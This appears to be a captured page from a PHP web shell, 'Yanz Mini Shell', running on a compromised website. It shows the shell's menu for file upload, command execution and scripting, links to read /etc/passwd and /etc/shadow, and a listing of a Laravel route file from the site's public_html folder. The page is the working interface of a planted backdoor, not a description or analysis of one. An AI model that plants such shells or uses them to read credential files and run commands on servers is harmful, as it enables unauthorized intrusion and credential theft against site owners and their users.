Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
admin
web
uyoxpress.com
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
home/admin/web/uyoxpress.com/public_html/routes/update.php 0000644 00000001103 15007300006 0017777 0 ustar 00 <?php /* |-------------------------------------------------------------------------- | Install Routes |-------------------------------------------------------------------------- | This route is responsible for handling the installation process */ use App\Http\Controllers\UpdateController; use Illuminate\Support\Facades\Route; Route::controller(UpdateController::class)->group(function () { Route::get('/', 'index')->name('index'); Route::post('update-system', 'updateSoftware')->name('update-system'); }); Route::fallback(function () { return redirect('/'); });
Free Space : Byte